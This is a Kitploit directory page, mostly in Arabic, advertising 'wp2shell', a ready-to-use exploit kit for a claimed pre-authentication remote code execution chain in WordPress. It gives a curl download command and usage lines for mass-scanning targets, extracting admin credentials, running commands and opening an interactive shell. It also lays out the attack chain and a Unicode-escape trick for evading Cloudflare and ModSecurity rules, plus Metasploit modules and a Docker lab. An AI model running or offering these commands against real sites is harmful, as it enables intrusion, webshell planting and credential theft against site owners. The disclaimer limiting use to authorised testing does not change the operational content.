Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2shell-Exploit-Waf-Bypass — استغلال RCE قبل المصادقة في ووردبريس + ماسح ضوئي + تجاوز WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + وحدات Metasploit + مختبر Docker | Kitploit
أدوات/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
ماسحات الثغرات الأمنية للويبالاستغلالاستغلال تطبيقات الويباختبار أمان APIتجاوز WAFاختبار الاختراقالفريق الأحمر
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

استغلال RCE قبل المصادقة في ووردبريس + ماسح ضوئي + تجاوز WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + وحدات Metasploit + مختبر Docker

عرض المستودع
227منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
                ___      __         ____
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
  by Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

تنفيذ أوامر عن بُعد بدون مصادقة على WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. تم إصلاحها في الإصدارات 6.8.6 و6.9.5 و7.0.2.

التثبيت السريع

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

سلسلة الهجوم

  1. الالتباس في التوجيه عبر طلبات مجمّعة متداخلة تحتوي مسار بادئ غير صالح لتجاوز المصادقة
  2. حقن SQL أعمى زمني لاستخراج بادئة الجداول ومعرّف المدير وبيانات الاعتماد
  3. تزوير الصفوف عبر UNION لزرع ذاكرات oEmbed المؤقتة (حقن SQL للقراءة فقط → كتابة في قاعدة البيانات)
  4. رفع صلاحيات Changeset + الاستدعاء المتكرر لـ parse_request() لتزوير حساب مسؤول
  5. رفع إضافة لنشر ويبشيل ذاتي التنظيف
  6. تنفيذ الأوامر والتنظيف التلقائي

الأدوات

الماسح الضوئي Go (go-scanner/wp2shell-master.go)

ملف ثنائي متكامل — مسح، فحص، قراءة، استغلال، وشل تفاعلي.

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

أدوات تجاوز WAF (waf-bypass/)

سكربتات مستقلة لتجاوز Cloudflare/ModSecurity عبر ترميز Unicode لكلمات SQL الرئيسية داخل JSON.

  • core.py — محرك حقن SQL أعمى مشترك مع تجاوز WAF
  • dump_version.py — استخراج @@version
  • dump_dbname.py — استخراج DATABASE()
  • dump_tables.py — تعداد الجداول
  • dump_columns.py — تعداد الأعمدة
  • rce_shell.py — سلسلة استغلال RCE كاملة مع تجاوز WAF

وحدات Metasploit (metasploit-modules/)

  • wp2shell_rce.rb — وحدة استغلال RCE كاملة (PR #21760)
  • wp2shell_scanner.rb — ماسح ضوئي غير مدمر (PR #21761)

التثبيت محليًا:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

تقنية تجاوز WAF

يقوم جدار حماية Cloudflare WAF بفحص بايتات JSON الخام لكنه لا يفك تسلسلات الهروب \uXXXX قبل مطابقة الأنماط. بينما تقوم دالة PHP json_decode() في WordPress بفك ترميزها بشفافية تامة.

  • SLEEP → SLEEP — يتجاوز اكتشاف الكلمات المفتاحية
  • بادئ النقطتين الرأسيتين (: بدلاً من http://:) — أقصر ويتجنب قواعد أنماط URI
  • مسار الرابط الدائم /wp-json/batch/v1 — يتجنب حظر ?rest_route=
  • ترويسات Origin وReferer من النطاق المستهدف — تفي بفحوصات CORS والتحقق من نفس الأصل

مختبر Docker

مختبر بدون WAF (المنفذ 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

مختبر WAF (المنفذ 9999)

ModSecurity CRS (OWASP) مع قواعد بأسلوب Cloudflare — تم تأكيد نجاح تجاوز Unicode.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

إخلاء المسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به غير قانوني.

الترخيص

MIT

root@kitploit:~
تنزيل الأداة